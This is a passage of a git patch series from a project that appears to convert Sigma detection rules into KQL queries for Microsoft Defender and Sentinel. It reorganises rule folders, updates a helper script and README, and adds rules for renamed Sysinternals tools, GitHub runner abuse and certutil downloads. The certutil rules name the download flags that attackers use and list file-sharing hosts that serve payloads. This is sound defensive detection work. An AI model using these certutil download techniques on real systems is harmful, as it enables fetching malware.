100% rename from KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql rename to KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql similarity index 100% rename from KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql rename to KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql similarity index 100% rename from KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql rename to KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql rename to KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql similarity index 100% rename from KQL/rules/Defense Evasion/screensaver_registry_key_set.kql rename to KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql rename to KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql similarity index 100% rename from KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql rename to KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql similarity index 100% rename from KQL/rules/Persistence/service_binary_in_suspicious_folder.kql rename to KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql similarity index 100% rename from KQL/rules/Persistence/servicedll_hijack.kql rename to KQL/rules/windows/registry/registry_set/servicedll_hijack.kql diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql rename to KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql rename to KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql diff --git a/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql new file mode 100644 index 00000000..5d665765 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql similarity index 100% rename from KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql rename to KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql rename to KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql rename to KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql rename to KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_service_installed.kql rename to KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql rename to KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql similarity index 100% rename from KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql rename to KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql similarity index 100% rename from KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql rename to KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql rename to KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql similarity index 100% rename from KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql rename to KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql similarity index 100% rename from KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql rename to KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_disabled.kql diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_notification_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql rename to KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql similarity index 100% rename from KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql rename to KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql similarity index 100% rename from KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql rename to KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql rename to KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql similarity index 100% rename from KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql rename to KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql rename to KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql similarity index 100% rename from KQL/rules/Collection/windows_recall_feature_enabled_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql similarity index 100% rename from KQL/rules/Defense Evasion/winget_admin_settings_modification.kql rename to KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql similarity index 100% rename from KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql rename to KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql rename to KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql diff --git a/helper.py b/helper.py index f5b00022..0c7d3fe1 100644 --- a/helper.py +++ b/helper.py @@ -154,9 +154,15 @@ def extract_mitre_tactic(tags): tags = yaml_contents.get("tags", []) TACTIC_FOLDER = extract_mitre_tactic(tags) - # Write the KQL query to a .kql file organized by tactic - BASE_OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) - OUTPUT_DIR = os.path.join(BASE_OUTPUT_DIR, TACTIC_FOLDER) + # Preserve original sigma repository folder structure for outputs + # Compute the path of the YAML file relative to the sigma base + rel_path = os.path.relpath(yml, SIGMA_BASE) + rel_dir = os.path.dirname(rel_path) + # If the file was at the top-level of SIGMA_BASE, fall back to rule_folder + if rel_dir: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rel_dir) + else: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) os.makedirs(OUTPUT_DIR, exist_ok=True) # Sanitize filename and convert to snake_case diff --git a/sigma b/sigma index c2f1eb41..0a6d9299 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit c2f1eb41bc5c9f246339545e8fd5ee14ed7f8332 +Subproject commit 0a6d9299743af4efec4268899b02d3d5c9335a1d From b50c2c466a0a50ad3ff5323bb0707b7a2c973bbd Mon Sep 17 00:00:00 2001 From: kaiberxc <89855993+Khadinxc@users.noreply.github.com> Date: Fri, 28 Nov 2025 22:54:38 +1100 Subject: [PATCH 12/17] update readme --- README.md | 26 ++++++-------------------- 1 file changed, 6 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index 28f49e3a..17de79dc 100644 --- a/README.md +++ b/README.md @@ -6,26 +6,12 @@ Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ ``` -├───rules -│ └───KQL -│ ├───Collection -│ ├───Command and Control -│ ├───Credential Access -│ ├───Defense Evasion -│ ├───Discovery -│ ├───Execution -│ ├───Exfiltration -│ ├───Impact -│ ├───Initial Access -│ ├───Lateral Movement -│ ├───Persistence -│ ├───Privilege Escalation -│ ├───Reconnaissance -│ └───Resource Development -├───rules-emerging-threats -│ └───KQL -└───rules-threat-hunting - └───KQL +├───KQL +│ ├───rules +│ ├───rules-compliance +│ ├───rules-emerging-threats +│ ├───rules-placeholder +│ └───rules-threat-hunting ``` ## How do I use the helper to do this locally or in a Detection as Code pipeline? From 85e802cc31412cc58cbb0557fa19595731356f9d Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 7 Dec 2025 02:39:14 +0000 Subject: [PATCH 13/17] chore: update KQL rules from latest Sigma rules --- .../html_file_opened_from_download_folder.kql | 15 +++++++++++++++ .../github_self_hosted_runner_execution.kql | 18 ++++++++++++++++++ .../suspicious_download_via_certutil_exe.kql | 4 ++-- ...nloaded_from_direct_ip_via_certutil_exe.kql | 4 ++-- ...m_file_sharing_website_via_certutil_exe.kql | 4 ++-- sigma | 2 +- 6 files changed, 40 insertions(+), 7 deletions(-) create mode 100644 KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql create mode 100644 KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql diff --git a/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql new file mode 100644 index 00000000..ab8db468 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql @@ -0,0 +1,15 @@ +// Title: HTML File Opened From Download Folder +// Author: Joseph Kamau +// Date: 2025-12-05 +// Level: low +// Description: Detects web browser process opening an HTML file from a user's Downloads folder. +// This behavior is could be associated with phishing attacks where threat actors send HTML attachments to users. +// When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware. +// During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment. +// MITRE Tactic: Initial Access +// Tags: attack.t1598.002, attack.t1566.001, attack.initial-access, attack.reconnaissance, detection.threat-hunting +// False Positives: +// - Opening any HTML file located in users directories via a browser process will trigger this. + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\users\\" and ProcessCommandLine contains "\\Downloads\\" and ProcessCommandLine contains ".htm") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql new file mode 100644 index 00000000..b43de036 --- /dev/null +++ b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql @@ -0,0 +1,18 @@ +// Title: Github Self-Hosted Runner Execution +// Author: Daniel Koifman (KoifSec) +// Date: 2025-11-29 +// Level: medium +// Description: Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution. +// Shai-Hulud is an npm supply chain worm targeting CI/CD environments. +// It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102.002, attack.t1071 +// False Positives: +// - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure +// - Authorized runner deployments by DevOps/Platform teams following change management +// - Scheduled runner updates or reconfigurations on existing build agents +// - Self-hosted runners that follow expected/known naming patterns +// - Installation via expected/known configuration management tools (reflected mostly as parent process name) + +DeviceProcessEvents +| where (ProcessCommandLine contains "spawnclient" and (FolderPath endswith "\\Runner.Worker.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Worker.dll")) or ((ProcessCommandLine contains "run" or ProcessCommandLine contains "configure") and (FolderPath endswith "\\Runner.Listener.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Listener.dll")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql index e7361697..3b0f2192 100644 --- a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql @@ -4,7 +4,7 @@ // Level: medium // Description: Detects the execution of certutil with certain flags that allow the utility to download files. // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 +// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file +| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql index 9a163806..b4f0f0ac 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql @@ -4,7 +4,7 @@ // Level: high // Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 +// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file +| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql index 40db540a..efe3691e 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql @@ -4,7 +4,7 @@ // Level: high // Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 +// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file +| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or 